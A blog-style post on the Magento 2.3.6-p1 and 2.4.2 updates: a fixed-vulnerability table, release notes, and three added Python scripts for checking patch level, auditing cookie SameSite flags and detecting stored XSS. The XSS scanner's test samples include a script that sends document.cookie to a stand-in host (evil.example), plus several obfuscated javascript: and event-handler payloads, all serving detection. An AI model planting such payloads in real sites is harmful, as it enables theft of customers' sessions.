Magento 2.3.6-p1 and 2.4.2 Updates


Magento has released new versions containing upgrades, substantial security changes, and performance improvements. The patched vulnerabilities are not known to have been exploited yet, but security updates should always be installed as soon as possible. If you only want the vulnerability fixes without the functional changes, security-only patches are available (APSB20-59).
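To check whether a store is already on a fixed release, the following Python script (an added example, not Magento or Adobe code) reads the Magento metapackage version from composer.lock and compares it with the minimum patched version of its release line: 2.3.6-p1 for 2.3.x and 2.4.2 for 2.4.x, which is what this page describes. The security-only patch suffix has to be parsed explicitly, because 2.3.6 must sort below 2.3.6-p1, and a plain string comparison would also put 2.3.10 before 2.3.6. The composer.lock excerpt is constructed for the example.

```python
import json
import re

# Minimum versions carrying the fixes discussed on this page, per release line.
# Assumption for this example: 2.3.x needs 2.3.6-p1, 2.4.x needs 2.4.2.
PATCHED_MINIMUM = {
    (2, 3): "2.3.6-p1",
    (2, 4): "2.4.2",
}

# Metapackages that carry the product version in composer.lock.
MAGENTO_METAPACKAGES = (
    "magento/product-community-edition",
    "magento/product-enterprise-edition",
)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-p(\d+))?$")


def parse_version(version):
    """Turn '2.3.6-p1' into a comparable tuple (2, 3, 6, 1).

    A release without a security patch suffix sorts as patch level 0,
    so 2.3.6 < 2.3.6-p1 < 2.3.7, and numeric fields avoid the lexical
    trap where '2.3.10' sorts before '2.3.6'.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Magento version: {version!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_patched(version):
    """True if `version` is at or above the fixed release for its line."""
    v = parse_version(version)
    minimum = PATCHED_MINIMUM.get(v[:2])
    if minimum is None:
        # Unknown release line (for example 2.2.x): no fixed release exists,
        # so report it as unpatched rather than silently passing it.
        return False
    return v >= parse_version(minimum)


def installed_magento_version(composer_lock_text):
    """Find the Magento metapackage version recorded in composer.lock."""
    lock = json.loads(composer_lock_text)
    for pkg in lock.get("packages", []):
        if pkg.get("name") in MAGENTO_METAPACKAGES:
            return pkg["version"]
    raise LookupError("no Magento metapackage in composer.lock")


# Constructed composer.lock excerpt (not from a real store) for a stand-alone run.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "magento/framework", "version": "102.0.6"},
        {"name": "magento/product-community-edition", "version": "2.3.6"},
    ]
})

if __name__ == "__main__":
    v = installed_magento_version(SAMPLE_LOCK)
    print(f"installed {v}: {'patched' if is_patched(v) else 'NEEDS UPDATE'}")
```

Run it from the Magento root against the real composer.lock (on a deployed store, bin/magento --version reports the same version). Release lines older than 2.3 are out of support and are reported as unpatched on purpose.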

Fixed vulnerabilities

Category | Vulnerability Impact | Severity | Magento Bug ID
File Upload Allow List Bypass | Arbitrary code execution | Critical | PRODSECBUG-2799
SQL Injection | Arbitrary read or write access to database | Critical | PRODSECBUG-2779
Improper Authorization | Unauthorized modification of customer list | Important | PRODSECBUG-2789
Insufficient Invalidation of User Session | Unauthorized access to restricted resources | Important | PRODSECBUG-2785
Improper Authorization | Unauthorized modification of Magento CMS pages | Important | PRODSECBUG-2796
Sensitive Information Disclosure | Disclosure of document root path | Moderate | PRODSECBUG-2798
Cross-site Scripting (Stored XSS) | Arbitrary JavaScript execution in the browser | Important | PRODSECBUG-2804
Improper Authorization | Unauthorized access to restricted resources | Important | PRODSECBUG-2797
Improper Authorization | Unauthorized access to restricted resources | Important | PRODSECBUG-2791

Source: Security Update for Magento | APSB20-59

Highlights of the new versions

  • Over 15 security enhancements (over 35 for Magento 2.4) that help close remote code execution (RCE) and cross-site scripting (XSS) vulnerabilities
  • CAPTCHA protection has been added to the following product areas:
    • Place Order storefront page and REST and GraphQL endpoints
    • Payment-related REST and GraphQL endpoints

Additional enhancements in Magento 2.4.2

Additional security enhancements

  • All core cookies now support the SameSite attribute.
  • Magento now warns about potentially malicious content in product and category description fields when a user tries to save those fields.
  • File system operations across Magento components have been standardized and hardened to prevent malicious uploads.
  • Core Content Security Policy (CSP) violations have been fixed.
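SameSite matters because a cookie that browsers attach to cross-site requests is what makes CSRF against the Admin and the storefront possible. The script below is an added example (not Magento code) that audits the Set-Cookie headers of a response after the upgrade and reports cookies that still lack SameSite, that set SameSite=None without Secure (current browsers reject such a cookie outright), or that lack Secure or HttpOnly. The cookie names in the sample headers are constructed for the example; cookies that storefront JavaScript has to read, such as form_key, are passed in as an allowlist so that their missing HttpOnly flag is not reported as a finding.

```python
def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attributes).

    Attribute names are lower-cased; flags without a value map to "".
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header_value, js_readable=frozenset()):
    """Return findings for one Set-Cookie header; an empty list means it passes."""
    name, _value, attrs = parse_set_cookie(header_value)
    findings = []
    same_site = attrs.get("samesite")
    if same_site is None:
        findings.append("no SameSite attribute (cross-site requests may carry it)")
    else:
        mode = same_site.lower()
        if mode not in ("strict", "lax", "none"):
            findings.append(f"unrecognised SameSite value {same_site!r}")
        elif mode == "none" and "secure" not in attrs:
            findings.append("SameSite=None without Secure (current browsers reject the cookie)")
    if "secure" not in attrs:
        findings.append("no Secure flag")
    # Cookies read by storefront JavaScript cannot be HttpOnly; skip them.
    if "httponly" not in attrs and name not in js_readable:
        findings.append("no HttpOnly flag")
    return [f"{name}: {f}" for f in findings]


def audit_response_headers(headers, js_readable=frozenset()):
    """Audit every Set-Cookie header in a list of (name, value) pairs."""
    findings = []
    for hname, hvalue in headers:
        if hname.lower() == "set-cookie":
            findings.extend(audit_cookie(hvalue, js_readable))
    return findings


# Constructed response headers (not captured from a real store) for a stand-alone run.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Set-Cookie", "PHPSESSID=7f3a9c; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "form_key=K1x9Qw; Path=/; Secure; SameSite=Lax"),
    ("Set-Cookie", "mage-cache-sessid=true; Path=/"),
    ("Set-Cookie", "private_content_version=4b2e; Path=/; SameSite=None"),
]
# Assumed set of cookies that storefront JavaScript reads, so HttpOnly is not expected.
JS_READABLE = frozenset({"form_key", "mage-cache-sessid", "private_content_version"})

if __name__ == "__main__":
    for line in audit_response_headers(SAMPLE_HEADERS, JS_READABLE):
        print(line)
```

Feed it the headers of a real response (for example captured with curl -si). Choose the SameSite mode per cookie rather than globally: Lax is a sensible default, but a session cookie with SameSite=Lax is not sent on the top-level POST that some payment providers use to return the customer to the store, so a store relying on such a redirect may need SameSite=None together with Secure on that cookie.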
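The warning on description fields addresses the stored XSS class listed in the table above: product and category descriptions are rich HTML rendered to every visitor, so a script element, an event-handler attribute or a javascript: URL saved there runs in customers' browsers. The scanner below is an added example of such a check (a heuristic written for this page, not Magento's own validator) that uses Python's html.parser to flag those constructs, including entity-encoded and tab-split javascript: URLs that a naive substring search misses. The sample descriptions are constructed.

```python
from html.parser import HTMLParser

# Elements that have no place in a product description and can load or run code.
DANGEROUS_TAGS = {"script", "iframe", "object", "embed", "base", "meta", "link", "form"}
# Attributes that take a URL and therefore accept a javascript: or data: payload.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data"}
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


def _normalise_url(value):
    # Browsers ignore tabs, newlines and other control characters inside a URL
    # scheme, so "java\tscript:" executes as javascript:. Dropping every character
    # at or below 0x20 before matching catches those variants (conservatively).
    return "".join(ch for ch in value if ord(ch) > 0x20).lower()


class SuspiciousHtmlScanner(HTMLParser):
    """Collects a human-readable finding for each suspicious construct seen."""

    def __init__(self):
        # convert_charrefs=True (the default) delivers attribute values entity-decoded,
        # so href="&#106;avascript:..." arrives here as "javascript:...".
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names for us.
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"<{tag} {name}=...> event handler")
            elif name in URL_ATTRS and value:
                url = _normalise_url(value)
                if url.startswith(DANGEROUS_SCHEMES):
                    self.findings.append(f"<{tag} {name}> uses {url.split(':', 1)[0]}: scheme")
            elif name == "style" and value and "expression(" in value.lower():
                self.findings.append(f"<{tag} style> uses CSS expression()")


def scan_description(html_text):
    """Return the findings for one description field ([] means nothing suspicious)."""
    scanner = SuspiciousHtmlScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


# Constructed description values (not taken from any real catalogue).
SAMPLES = {
    "clean": '<p>Soft <b>cotton</b> tee. <a href="https://example.com/size-guide">Size guide</a></p>',
    "script": '<p>Nice</p><script>fetch("//evil.example/?c=" + document.cookie)</script>',
    "handler": '<img src="x" onerror="alert(document.domain)">',
    "js_href": '<a href="JavaScript:alert(1)">click</a>',
    "encoded": '<a href="&#106;avascript:alert(1)">click</a>',
    "tabbed": '<a href="java\tscript:alert(1)">click</a>',
}

if __name__ == "__main__":
    for label, html_text in SAMPLES.items():
        print(f"{label}: {scan_description(html_text) or 'ok'}")
```

A warning like this helps a content editor notice a pasted payload or a compromised Admin account's edits; it is not a sanitizer, and the actual protection against stored XSS remains output escaping together with the Content Security Policy.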

Platform enhancements

  • Elasticsearch 7.9.x is now supported.
  • Magento 2.4.2 has been tested with Varnish 6.4.
  • Redis 6.x is now supported.
  • Magento 2.4.2 is now compatible with Composer 2.x.

Performance enhancements

This release includes code enhancements that boost API performance and Admin response time for deployments with large catalogs.

GraphQL

  • Added support for comparison lists.
  • Added the generateCustomerTokenAsAdmin mutation and updated the Customer object to support remote purchasing assistance.
  • Added localization support across stores to support tasks such as changing languages, carts, and currencies.
  • Added support for unions in Magento GraphQL.
  • The GraphQL schema has been enhanced to optimize product data retrieval for configurable products with many variants.
  • Integer type object IDs have been deprecated in favor of uid attributes of type ID.
  • Added the staging attribute to the ProductInterface and CategoryInterface to determine if a product is staged and to view its associated campaign information.

PWA Studio

  • Internationalization and localization.
  • Improved extensibility framework to support code changes through extensions.
  • Initial components for My Account related features such as Wishlist, Saved Payments, Address Book, and Order History.
  • Various performance optimizations and bug fixes.
  • New Role Resources for the Media Gallery to control who can perform these actions:
    • Insert media assets into content
    • Upload assets
    • Edit asset details
    • Delete assets from the Media Gallery
    • Manage folder structure
  • Web-optimized images in content.

Other enhancements

  • This release includes Adobe Stock Integration v2.1.1.
  • MFTF 3.2.1 is now available.
  • Updates to vendor-developed extensions.
  • AWS S3 support enhancements.

Fixed issues

Both the Magento 2.3 and the Magento 2.4 updates fix a large number of issues. The full list of more than 160 fixes for Magento 2.3 is on devdocs.magento.com.

The list of more than 280 fixes for Magento 2.4 is on devdocs.magento.com as well.

Remember to create a backup before installing updates.

Picture courtesy of Joseph Kellner.